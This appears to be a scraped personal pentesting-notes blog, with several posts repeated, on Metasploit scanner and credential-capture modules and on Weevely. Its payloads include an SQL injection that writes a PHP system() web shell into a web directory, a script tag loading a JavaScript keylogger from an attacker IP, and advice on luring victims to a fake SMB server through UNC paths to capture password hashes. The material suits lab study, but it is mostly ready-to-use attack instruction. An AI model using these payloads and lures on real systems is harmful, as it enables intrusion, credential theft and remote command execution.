moved permanently to http://z-eagle.blogspot.com/
moved permanently to http://z-eagle.blogspot.com/
auxiliary/scanner/vmware/vmauthd_login
VMWare Authentication Daemon Login Scanner
This module will test vmauthd logins on a range of machines and report successful logins.
![SQLi to Backdoor
SELECT ‘somecode’ INTO DUMPFILE [path to file];
http://dev.mysql.com/doc/refman/5.1/en/select-into.html
this function is used to write strings (in our case, code) to a file.
used scripts:
’ union select null,”<h1>pawned</h1> <?php system($_REQUEST[‘cmd’]); ?>” INTO DUMPFILE ‘c:\xampp\htdocs\dvwa\test.php’ #
or
’ union select null,” <h1>pawned</h1> <?php system($_REQUEST[‘cmd’]); ?> ” INTO DUMPFILE ‘..\..\htdocs\dvwa\test.php’ #
[to execute a command: access the url: http://server ip/uri/backdoor.php?cmd=somecommand]
[http://192.168.0.148/dvwa/backdoor.php?cmd=whoami]
or
’ union select null,”weevely php script” INTO DUMPFILE ‘c:\xampp\htdocs\dvwa\test.php’ #
if ‘mysql_real_escape_string’ function is used, forget injecting that code, and simply use sqlmap to get password hash, login then execute the code :)](http://25.media.tumblr.com/tumblr_m7ug7hgbYU1rzijklo1_500.png)
SQLi to Backdoor
SELECT ‘somecode’ INTO DUMPFILE [path to file];
http://dev.mysql.com/doc/refman/5.1/en/select-into.html
this function is used to write strings (in our case, code) to a file.
used scripts:
’ union select null,”<h1>pawned</h1> <?php system($_REQUEST[‘cmd’]); ?>” INTO DUMPFILE ‘c:\xampp\htdocs\dvwa\test.php’ #
or
’ union select null,” <h1>pawned</h1> <?php system($_REQUEST[‘cmd’]); ?> ” INTO DUMPFILE ‘..\..\htdocs\dvwa\test.php’ #
[to execute a command: access the url: http://server ip/uri/backdoor.php?cmd=somecommand]
[http://192.168.0.148/dvwa/backdoor.php?cmd=whoami]
or
’ union select null,”weevely php script” INTO DUMPFILE ‘c:\xampp\htdocs\dvwa\test.php’ #
if ‘mysql_real_escape_string’ function is used, forget injecting that code, and simply use sqlmap to get password hash, login then execute the code :)
![Weevely
Weevely is a PHP web shell that provide telnet-like console to execute system commands and automatize administration and post-exploitation tasks.
Just generate and upload the server PHP code on the target web server, and run Weevely client locally to transmit shell commands.
[generating backdoor] weevely.py generate <password> <output path>
[starting telnet session] weevely.py <url> <password>
[modules]
:audit.etc_passwd [filter]
:audit.user_files [auto] [list] [path]
:audit.user_web_files <url> <rpath> [deep]
:backdoor.reverse_tcp <host> <port>
:backdoor.tcp <port>
:bruteforce.ftp <user> <lpath> [sline] [host] [port]
:bruteforce.ftp_users <lpath> [host] [port]
:bruteforce.sql <dbms> <user> <lpath> [sline] [host]
:bruteforce.sql_users <dbms> <lpath> [host]
:file.check <rpath> <mode>
:file.download <rpath> <lpath>
:file.enum <lpath> [printall]
:file.read <rpath>
:file.rm <rpath> [recursive]
:file.upload <lpath> <rpath> [chunksize]
:find.name [match] <str> <rpath>
:find.perms [qty] [type] [perm] [rpath]
:find.suidsgid [type] [rpath]
:find.webdir [rpath]
:generate.htaccess [path]
:generate.img <lpath> [outdir]
:generate.php [path]
:load
:net.ifaces
:net.php_proxy [rpath] [finddir]
:net.proxy [rpath] [rurl] [finddir] [lport]
:net.scan <addr> <port> [onlyknownports] [portsperreq]
:set
:shell.php <cmd> [mode] [proxy]
:shell.sh <cmd> [stderr]
:show
:sql.console <dbms> <user> <pwd> [host]
:sql.dump <dbms> <user> <pwd> <db> [table] [host] [lfile]
:sql.query <dbms> <user> <pwd> <query> [host]
:sql.summary <dbms> <user> <pwd> <db> [host]
:system.info [info]
https://github.com/epinna/Weevely/wiki/Tutorial
DEMO:
root@bt:/pentest/backdoors/web/weevely# ./weevely.py test /root/test.php
root@bt:/pentest/backdoors/web/weevely# ./weevely.py http://192.168.45.1/test/test.php test](http://24.media.tumblr.com/tumblr_m7r4egtX7f1rzijklo1_500.png)
![Weevely
Weevely is a PHP web shell that provide telnet-like console to execute system commands and automatize administration and post-exploitation tasks.
Just generate and upload the server PHP code on the target web server, and run Weevely client locally to transmit shell commands.
[generating backdoor] weevely.py generate <password> <output path>
[starting telnet session] weevely.py <url> <password>
[modules]
:audit.etc_passwd [filter]
:audit.user_files [auto] [list] [path]
:audit.user_web_files <url> <rpath> [deep]
:backdoor.reverse_tcp <host> <port>
:backdoor.tcp <port>
:bruteforce.ftp <user> <lpath> [sline] [host] [port]
:bruteforce.ftp_users <lpath> [host] [port]
:bruteforce.sql <dbms> <user> <lpath> [sline] [host]
:bruteforce.sql_users <dbms> <lpath> [host]
:file.check <rpath> <mode>
:file.download <rpath> <lpath>
:file.enum <lpath> [printall]
:file.read <rpath>
:file.rm <rpath> [recursive]
:file.upload <lpath> <rpath> [chunksize]
:find.name [match] <str> <rpath>
:find.perms [qty] [type] [perm] [rpath]
:find.suidsgid [type] [rpath]
:find.webdir [rpath]
:generate.htaccess [path]
:generate.img <lpath> [outdir]
:generate.php [path]
:load
:net.ifaces
:net.php_proxy [rpath] [finddir]
:net.proxy [rpath] [rurl] [finddir] [lport]
:net.scan <addr> <port> [onlyknownports] [portsperreq]
:set
:shell.php <cmd> [mode] [proxy]
:shell.sh <cmd> [stderr]
:show
:sql.console <dbms> <user> <pwd> [host]
:sql.dump <dbms> <user> <pwd> <db> [table] [host] [lfile]
:sql.query <dbms> <user> <pwd> <query> [host]
:sql.summary <dbms> <user> <pwd> <db> [host]
:system.info [info]
https://github.com/epinna/Weevely/wiki/Tutorial
DEMO:
root@bt:/pentest/backdoors/web/weevely# ./weevely.py test /root/test.php
root@bt:/pentest/backdoors/web/weevely# ./weevely.py http://192.168.45.1/test/test.php test](http://25.media.tumblr.com/tumblr_m7r4egtX7f1rzijklo2_500.png)
Weevely
Weevely is a PHP web shell that provide telnet-like console to execute system commands and automatize administration and post-exploitation tasks.
Just generate and upload the server PHP code on the target web server, and run Weevely client locally to transmit shell commands.
[generating backdoor] weevely.py generate <password> <output path>
[starting telnet session] weevely.py <url> <password>
[modules]
- :audit.etc_passwd [filter]
- :audit.user_files [auto] [list] [path]
- :audit.user_web_files <url> <rpath> [deep]
- :backdoor.reverse_tcp <host> <port>
- :backdoor.tcp <port>
- :bruteforce.ftp <user> <lpath> [sline] [host] [port]
- :bruteforce.ftp_users <lpath> [host] [port]
- :bruteforce.sql <dbms> <user> <lpath> [sline] [host]
- :bruteforce.sql_users <dbms> <lpath> [host]
- :file.check <rpath> <mode>
- :file.download <rpath> <lpath>
- :file.enum <lpath> [printall]
- :file.read <rpath>
- :file.rm <rpath> [recursive]
- :file.upload <lpath> <rpath> [chunksize]
- :find.name [match] <str> <rpath>
- :find.perms [qty] [type] [perm] [rpath]
- :find.suidsgid [type] [rpath]
- :find.webdir [rpath]
- :generate.htaccess [path]
- :generate.img <lpath> [outdir]
- :generate.php [path]
- :load
- :net.ifaces
- :net.php_proxy [rpath] [finddir]
- :net.proxy [rpath] [rurl] [finddir] [lport]
- :net.scan <addr> <port> [onlyknownports] [portsperreq]
- :set
- :shell.php <cmd> [mode] [proxy]
- :shell.sh <cmd> [stderr]
- :show
- :sql.console <dbms> <user> <pwd> [host]
- :sql.dump <dbms> <user> <pwd> <db> [table] [host] [lfile]
- :sql.query <dbms> <user> <pwd> <query> [host]
- :sql.summary <dbms> <user> <pwd> <db> [host]
- :system.info [info]
https://github.com/epinna/Weevely/wiki/Tutorial
DEMO:
root@bt:/pentest/backdoors/web/weevely# ./weevely.py test /root/test.php
root@bt:/pentest/backdoors/web/weevely# ./weevely.py http://192.168.45.1/test/test.php test
auxiliary/scanner/smb/smb_lookupsid
The smb_lookupsid module brute-forces SID lookups on a range of targets to determine what local users exist the system. Knowing what users exist on a system can greatly speed up any further brute-force logon attempts later on.
auxiliary/scanner/smb/smb_enumshares
used to enumerate shared folders on the remote machine, RHOSTS
auxiliary/scanner/smb/smb_enumusers
used to enumerate users on the remote machine, RHOSTS
auxiliary/scanner/smb/smb_enumusers_domain
used to enumerate …
auxiliary/scanner/smb/smb_login
used to bruteforce smb login;
1- Network and Sharing Center » Advanced sharing settings » “turn off password protected sharing”
it will accept any username » equivalent to “smbclient -L RHOSTS —user=anything”
2- Network and Sharing Center » Advanced sharing settings » “turn on password protected sharing”
it will only accept ‘user accounts with password option activated’ on the machine with shared contents » equivalent to “smbclient -L RHOSTS —user=useraccount”
auxiliary/server/capture/smb
This module provides a FAKE SMB service that can be used to capture the challenge-response password hashes of SMB client systems.
Responses sent by this service have by default the configurable challenge string (\x11\x22\x33\x44\x55\x66\x77\x88), allowing for easy cracking using Cain & Abel, L0phtcrack or John the ripper (with jumbo patch).
To exploit this, the target system must try to authenticate to this module. The easiest way to force a SMB authentication attempt is by embedding a UNC path (\SERVER\SHARE) into a web page or email message. When the victim views the web page or email, their system will automatically connect to the server specified in the UNC share (the IP address of the system running this module) and attempt to authenticate.
SMB: Server Message Block (SMB), also known as Common Internet File System (CIFS) used for providing shared access to files, printers, serial ports, and miscellaneous communications between nodes on a network.
http://en.wikipedia.org/wiki/Server_Message_Block
http://oss.sgi.com/LDP/HOWTO/SMB-HOWTO-8.html
to access the fake server and put the password » sbmclient -L server ip
to crack the password hash » john JOHNPWFILE
![auxiliary/server/capture/http_javascript_keylogger
This modules runs a web server that demonstrates keystroke logging through JavaScript. The DEMO option can be set to enable a page that demonstrates this technique.
To use this module with an existing web page, simply add a script source tag pointing to the URL of this service ending in the .js extension. For example, if URIPATH is set to “test”, the following URL will load this script into the calling site: http://server:port/test/anything.js
[link format] http://attacker ip:SRVPORT/URIPATH/xxxx.js
DEMO
1- the used script:
<script type=”text/javascript” src=”http://192.168.45.128:8080/H8JxRL3B/test.js”>
</script>
2- search for ettercap
http://www.irongeek.com/i.php?page=security/ettercapfilter
To view the demo page use http://ip:8080/demo](http://24.media.tumblr.com/tumblr_m7oszs47eo1rzijklo1_500.png)
auxiliary/server/capture/http_javascript_keylogger
This modules runs a web server that demonstrates keystroke logging through JavaScript. The DEMO option can be set to enable a page that demonstrates this technique.
To use this module with an existing web page, simply add a script source tag pointing to the URL of this service ending in the .js extension. For example, if URIPATH is set to “test”, the following URL will load this script into the calling site: http://server:port/test/anything.js
[link format] http://attacker ip:SRVPORT/URIPATH/xxxx.js
DEMO
1- the used script:
<script type=”text/javascript” src=”http://192.168.45.128:8080/H8JxRL3B/test.js”>
</script>
2- search for ettercap
http://www.irongeek.com/i.php?page=security/ettercapfilter
To view the demo page use http://ip:8080/demo
auxiliary/server/capture/ftp
This module provides a fake FTP service that is designed to capture authentication credentials.
